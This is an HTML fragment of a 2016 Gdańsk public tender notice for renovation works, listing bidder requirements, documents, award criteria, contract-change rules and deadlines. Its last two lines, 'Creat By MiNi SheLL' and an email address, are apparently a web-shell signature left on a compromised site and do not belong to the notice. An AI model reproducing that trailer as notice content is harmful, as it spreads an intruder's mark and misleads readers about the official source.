Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował osobami w trakcie realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dotyczącego sytuacji ekonomicznej Wykonawca musi wykazać dysponowanie ubezpieczeniem od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości co najmniej 300 000,00 zł. <br>

W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek musi spełniać co najmniej jeden wykonawca. <br>

Wykonawca może polegać na zdolnościach ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował zasobami w trakcie realizacji zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Przez najważniejsze roboty Zamawiający rozumie roboty budowlane polegającą na wykonaniu robót remontowych w czynnych obiektach użyteczności publicznej w zakresie robót elektrycznych i sanitarnych o wartości nie mniejszej niż 200 000,00 zł brutto <br>

Zamawiający nie żąda informacji o robotach niewykonanych lub wykonanych nienależycie,;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. <br>
      Wyżej wymienione zobowiązanie musi być złożone w formie oryginału.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Złożyć Druk OFERTA, który należy sporządzić wg wzoru druku zamawiającego.<br>
b)	Podać w złożonej ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcy lub nazwy podwykonawców, na których zasoby wykonawca powołuje się, w celu wykazania spełnienia warunku udziału w postępowaniu. W przypadku nie wskazania podwykonawców, zamawiający uzna, że całość zamówienia będzie wykonywana przez Wykonawcę osobiście.<br>
c)	Podać w ofercie, czy wybór oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego, zgodnie z  przepisami o podatku od towarów i usług.<br>
d)	Udzielić gwarancji za wady na okres minimum 3 lat. <br>
       Zamawiający zrównuje okres rękojmi z okresem gwarancji określonym przez Wykonawcę w ofercie.<br>
e)	Podać w ofercie termin wykonania robót.<br>
       Maksymalny termin wykonania robót nie może być dłuższy niż 90 dni.<br>
   Jeżeli Wykonawca określi termin wykonania robót powyżej 90 dni  - jego oferta zostanie odrzucona.<br>
f)	Złożyć Kosztorysy ofertowe  (uproszczone), wg przedmiarów robót Zamawiającego.<br>
g)	Złożyć druk Zestawienie kosztorysów, który należy sporządzić wg wzoru druku Zamawiającego.<br>
h)	Załączyć kopię dowodu wpłaty wadium wpłaconego w pieniądzu lub oryginał albo kopię wadium  wniesionego w jednej z form określonych w punkcie 15 SIWZ.<br>
i)	Wykazać, że oferta została podpisana przez osobę(y) uprawnioną(e) do występowania w imieniu i na rzecz Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.85</li>
<li>2 - Termin wykonania robót - 0.15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Następujące postanowienia umowy mogą ulec zmianie:<br>
1.	Przesunięciu może ulec termin wykonania przedmiotu zamówienia.<br>
2.	Zmianie może ulec osoba Kierownika budowy lub Kierownika robót robót jako przedstawicieli Wykonawcy pod warunkiem wcześniejszego powiadomienia Zamawiającego o tym fakcie.<br>  
3.	Zmiana lub rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu.<br>
4.	Możliwość realizacji umowy przez podwykonawców (zawarcie umów o podwykonawstwo) na etapie jej realizacji, w przypadku braku zadeklarowania realizacji zamówienia przy pomocy podwykonawców na etapie składania ofert.<br> 
	Zmiany w umowie mogą zostać wprowadzone przy zaistnieniu następujących okoliczności:<br>
1.	Termin wykonania zamówienia może ulec zmianie w przypadku:<br>
a)	Wstrzymania robót przez Zamawiającego lub przerwy w wykonywaniu robót powstałych na skutek okoliczności, za które ponosi odpowiedzialność Zamawiający.<br>
b)	Inne  zmiany spowodowane warunkami niezależnymi i niezawinionymi przez wykonawcę.<br>
2.	W przypadku wystąpienia okoliczności wymienionych w pkt 1  termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia robót budowlanych w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. <br>	
3.	Zmiana osoby Kierownika budowy lub Kierownika robót może nastąpić z przyczyn losowych, niezależnych od Zamawiającego i Wykonawcy np. śmierci, choroby lub w przypadku rozwiązania przez Wykonawcę umowy z Kierownikiem budowy lub Kierownikiem robót, itp. Zamawiający zaakceptuje zmianę Kierownika budowy lub Kierownika robót, gdy kwalifikacje i doświadczenie wskazanych osób będą spełniać warunki postawione w tym zakresie w specyfikacji istotnych warunków zamówienia.<br>
4.	Zmiana lub rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu  jest możliwa w przypadku wykazania przez wykonawcę, iż proponowany inny podwykonawca (lub wykonawca samodzielnie) spełnia dany warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.<br>
5.	Zawarcie umów o podwykonawstwo na etapie realizacji umowy w przypadku braku zadeklarowania realizacji zamówienia przy pomocy podwykonawców na etapie składania ofert jest możliwa, jeżeli w stosunku do części zamówienia, na którą ma być zawarta umowa o podwykonawstwo nie została wyłączona dopuszczalność podwykonawstwa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gznk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 80-171 Gdańsk, ul. Cygańska Góra 1, pok. nr 11 w godz. 9:00 - 12:00. <br>
Cena brutto -61,50 zł.<br>
Warunki i sposób płatności: zaliczenie pocztowe,przelew.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2016 godzina 10:00, miejsce: siedziba Zamawiającego, 80-171 Gdańsk, ul. Cygańska Góra 1, pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 06.09.2016.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> DATA, GODZINA I MIEJSCE OTWARCIA OFERT: 08.08.2016 r. godzina  10:15, <br>
Miejsce: siedziba zamawiającego, 80-171 Gdańsk ul. Cygańska Góra 1, w  pokoju nr 6 - świetlica<br>

OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI <br>
Grażyna Pietrowska stanowisko służbowe specjalista  ds. zamówień publicznych, <br>
80- 171 Gdańsk ul. Cygańska Góra 1, nr pok. 11, tel.  58 320 02 20<br>
Adres poczty elektronicznej: pietrowska@gznk.pl<br>

ZASADY WYKLUCZENIA WYKONAWCY<br>
Z postępowania o udzielenie zamówienia Zamawiający wykluczy również wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych.<br>
Zamawiający nie wykluczy z postępowania o udzielenie zamówienia publicznego wykonawcy, który udowodnił, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mając zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com